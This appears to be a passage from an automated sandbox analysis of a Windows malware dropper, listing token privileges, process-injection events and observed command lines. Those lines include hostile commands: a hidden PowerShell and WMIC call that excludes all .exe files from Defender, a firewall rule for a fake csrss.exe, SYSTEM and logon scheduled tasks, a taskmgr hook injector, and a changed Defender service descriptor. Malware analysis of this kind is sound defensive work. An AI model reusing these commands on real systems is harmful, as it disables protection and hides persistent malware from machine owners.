Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4284 wrote to memory of 3076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe
PID 4284 wrote to memory of 3076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe
PID 4284 wrote to memory of 3076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe
PID 3076 wrote to memory of 3400 N/A C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe
PID 3076 wrote to memory of 3400 N/A C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe
PID 3076 wrote to memory of 3400 N/A C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe
PID 4284 wrote to memory of 3044 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
PID 4284 wrote to memory of 3044 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
PID 4284 wrote to memory of 3044 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
PID 4284 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe
PID 4284 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe
PID 4284 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe
PID 3044 wrote to memory of 3320 N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 3320 N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 3320 N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3800 wrote to memory of 1472 N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3800 wrote to memory of 1472 N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3800 wrote to memory of 1472 N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 4544 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
PID 4284 wrote to memory of 4544 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
PID 1300 wrote to memory of 4084 N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1300 wrote to memory of 4084 N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1300 wrote to memory of 4084 N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 1228 N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 1228 N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 1228 N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 3888 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe
PID 4284 wrote to memory of 3888 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe
PID 4284 wrote to memory of 3888 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe
PID 4284 wrote to memory of 724 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 4284 wrote to memory of 724 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 4284 wrote to memory of 724 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 2584 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 2584 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 2584 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1100 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1100 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1100 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1016 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1016 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1016 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 3888 wrote to memory of 2088 N/A C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe
PID 3888 wrote to memory of 2088 N/A C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe
PID 3888 wrote to memory of 2088 N/A C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe
PID 1016 wrote to memory of 1116 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 1016 wrote to memory of 1116 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 1016 wrote to memory of 1116 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 2088 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2088 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2088 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1508 wrote to memory of 1892 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1508 wrote to memory of 1892 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1508 wrote to memory of 1892 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SYSTEM32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe

"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe

"C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe"

C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe

"C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3400 -ip 3400

C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe

"C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 1128

C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe

"C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe

"C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe

"C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe"

C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe

"C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe

"C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe"

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe

"C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe" --silent --allusers=0

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6f17e1d0,0x6f17e1dc,0x6f17e1e8

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe

.\Install.exe /nxdidQZJ "385118" /S

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe

"C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=724 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419140452" --session-guid=70a790ff-7af7-4039-a4c9-a3be2700ab7a --server-tracking-blob="NTU2OWNkYmVmNDljZjA1NzFhNjFjZjIyYTUxMzVlYTQzNzNjYTQ3NzAwNTlhODZjZWI2NGM0YTg4NDdkZmMyNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNTM1NDgxLjYxMzkiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMmFhMmY4YjctMTViNS00YWYxLTljOWItNTZkMTEyNjJlZTBlIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2804000000000000

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6e02e1d0,0x6e02e1dc,0x6e02e1e8

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe\" em /OQsite_idAGR 385118 /S" /V1 /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xd86038,0xd86044,0xd86050

C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe

"C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3076 -ip 3076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 1652

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

